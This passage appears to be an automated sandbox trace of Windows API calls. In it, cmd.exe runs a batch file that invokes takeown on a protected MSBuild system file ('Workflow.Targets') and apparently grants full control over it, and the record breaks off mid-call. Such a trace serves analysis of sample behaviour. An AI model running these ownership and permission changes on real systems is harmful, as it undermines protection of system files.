lpFilePart=0xcdf29c*="Desktop") returned 0x1d [0269.033] SetErrorMode (uMode=0x0) returned 0x1 [0269.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0269.033] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0269.033] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0269.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.033] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0269.033] GetLastError () returned 0x2 [0269.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.033] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0269.034] GetLastError () returned 0x2 [0269.034] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xec0df8 [0269.034] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0269.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0269.034] GetLastError () returned 0x2 [0269.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xec0df8 [0269.034] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0269.034] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0269.034] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0269.034] GetConsoleTitleW (in: lpConsoleTitle=0xcdf070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0269.034] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0269.034] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0269.034] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0269.034] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0269.034] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0269.034] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0269.034] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0269.035] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0269.035] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0269.035] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0269.035] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0269.035] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0269.035] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0269.035] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0269.035] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0269.035] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0269.035] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0269.035] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0269.035] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0269.035] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0269.035] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0269.035] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0269.035] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0269.035] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0269.035] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0269.035] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0269.035] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0269.035] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0269.035] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0269.035] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0269.035] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0269.035] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0269.035] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0269.035] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0269.035] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0269.035] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0269.035] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0269.035] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0269.035] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0269.035] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0269.035] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0269.036] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0269.036] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0269.036] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0269.036] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0269.036] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0269.036] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0269.036] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0269.036] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0269.036] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0269.036] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0269.036] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0269.036] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0269.036] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0269.036] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0269.036] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0269.036] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0269.036] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0269.036] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0269.036] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0269.036] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0269.036] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0269.036] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0269.036] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0269.036] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0269.036] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0269.036] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0269.036] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0269.036] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0269.036] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0269.036] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0269.036] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0269.036] SetErrorMode (uMode=0x0) returned 0x0 [0269.036] SetErrorMode (uMode=0x1) returned 0x0 [0269.036] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xecd038, lpFilePart=0xcdeb7c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcdeb7c*="Desktop") returned 0x1d [0269.036] SetErrorMode (uMode=0x0) returned 0x1 [0269.036] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0269.036] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0269.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0269.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.037] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0269.037] GetLastError () returned 0x2 [0269.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.037] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0269.037] GetLastError () returned 0x2 [0269.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xec0df8 [0269.037] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0269.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0269.038] GetLastError () returned 0x2 [0269.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xec0df8 [0269.038] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0269.038] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0269.038] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0269.038] GetConsoleTitleW (in: lpConsoleTitle=0xcdedfc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0269.038] InitializeProcThreadAttributeList (in: lpAttributeList=0xcded28, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xcded0c | out: lpAttributeList=0xcded28, lpSize=0xcded0c) returned 1 [0269.038] UpdateProcThreadAttribute (in: lpAttributeList=0xcded28, dwFlags=0x0, Attribute=0x60001, lpValue=0xcded14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xcded28, lpPreviousValue=0x0) returned 1 [0269.038] GetStartupInfoW (in: lpStartupInfo=0xcded60 | out: lpStartupInfo=0xcded60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0269.038] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0269.039] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0269.039] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0269.039] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xcdecb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcdecfc | out: lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessInformation=0xcdecfc*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x118, dwThreadId=0x8e0)) returned 1 [0269.046] CloseHandle (hObject=0xb8) returned 1 [0269.046] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0269.046] GetEnvironmentStringsW () returned 0xece3d8* [0269.046] FreeEnvironmentStringsA (penv="=") returned 1 [0269.047] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0273.499] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xcdec94 | out: lpExitCode=0xcdec94*=0x0) returned 1 [0273.499] CloseHandle (hObject=0xb0) returned 1 [0273.499] _vsnwprintf (in: _Buffer=0xcded7c, _BufferCount=0x13, _Format="%08X", _ArgList=0xcdec9c | out: _Buffer="00000000") returned 8 [0273.499] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0273.499] GetEnvironmentStringsW () returned 0xece3d8* [0273.500] FreeEnvironmentStringsA (penv="=") returned 1 [0273.500] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0273.500] GetEnvironmentStringsW () returned 0xece3d8* [0273.500] FreeEnvironmentStringsA (penv="=") returned 1 [0273.500] DeleteProcThreadAttributeList (in: lpAttributeList=0xcded28 | out: lpAttributeList=0xcded28) [0273.500] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.500] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0273.538] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.538] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0273.539] _get_osfhandle (_FileHandle=0) returned 0x38 [0273.539] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0273.539] SetConsoleInputExeNameW () returned 0x1 [0273.539] GetConsoleOutputCP () returned 0x1b5 [0273.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0273.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.539] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0273.539] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0273.539] _get_osfhandle (_FileHandle=3) returned 0xb0 [0273.539] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0273.540] _get_osfhandle (_FileHandle=3) returned 0xb0 [0273.540] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0273.540] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0xb3, lpOverlapped=0x0) returned 1 [0273.540] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0273.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0273.540] _get_osfhandle (_FileHandle=3) returned 0xb0 [0273.540] GetFileType (hFile=0xb0) returned 0x1 [0273.540] _get_osfhandle (_FileHandle=3) returned 0xb0 [0273.540] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0273.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", nBufferLength=0x208, lpBuffer=0xcdec08, lpFilePart=0xcdebcc | out: lpBuffer="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFilePart=0xcdebcc*="Workflow.Targets") returned 0x54 [0273.540] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.540] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0273.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.541] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.541] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] _wcsnicmp (_String1="MICROS~1", _String2="Microsoft", _MaxCount=0x9) returned 15 [0273.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.541] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] _wcsnicmp (_String1="WINDOW~1", _String2="Windows Workflow Foundation", _MaxCount=0x1b) returned 11 [0273.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.541] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0273.541] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0273.541] _wcsicmp (_String1="set", _String2=")") returned 74 [0273.541] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0273.541] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0273.541] _wcsicmp (_String1="IF", _String2="set") returned -10 [0273.542] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0273.542] _wcsicmp (_String1="REM", _String2="set") returned -1 [0273.542] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0273.542] _tell (_FileHandle=3) returned 63 [0273.542] _close (_FileHandle=3) returned 0 [0273.542] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf250 | out: _Buffer="\r\n") returned 2 [0273.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.542] GetFileType (hFile=0x3c) returned 0x2 [0273.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.542] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf228 | out: lpMode=0xcdf228) returned 1 [0273.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.542] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf240, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf240*=0x2) returned 1 [0273.543] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0273.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0273.543] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf24c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0273.544] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf24c | out: _Buffer=">") returned 1 [0273.544] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.544] GetFileType (hFile=0x3c) returned 0x2 [0273.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.544] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf22c | out: lpMode=0xcdf22c) returned 1 [0273.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.597] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf244, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf244*=0x1e) returned 1 [0273.751] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.751] GetFileType (hFile=0x3c) returned 0x2 [0273.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.751] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4cc | out: lpMode=0xcdf4cc) returned 1 [0275.454] _get_osfhandle (_FileHandle=1) returned 0x3c [0275.454] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xed8290*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xcdf4e4, lpReserved=0x0 | out: lpBuffer=0xed8290*, lpNumberOfCharsWritten=0xcdf4e4*=0x3) returned 1 [0275.620] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4ec | out: _Buffer=" FN=\"Workflow.Targets\" ") returned 23 [0275.620] _get_osfhandle (_FileHandle=1) returned 0x3c [0275.620] GetFileType (hFile=0x3c) returned 0x2 [0275.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0275.620] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0275.639] _get_osfhandle (_FileHandle=1) returned 0x3c [0275.639] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, 